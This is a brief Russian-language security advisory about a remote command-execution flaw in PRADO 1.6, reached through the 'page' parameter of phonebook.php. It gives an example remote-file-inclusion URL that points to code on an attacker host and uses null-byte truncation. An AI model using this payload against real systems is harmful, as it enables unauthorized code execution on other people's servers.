• Партнер

  • Программа: PRADO 1.6 

    Уязвимость в PRADO позволяет удаленному пользователю выполнить произвольные команды на целевой системе.
    Уязвимость обнаружена в параметре page в сценарии phonebook.php. 

    Пример: 

    http://[target]/examples/phonebook.php?page= http://[attacker]/evilcode.txt%00&filter=P

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии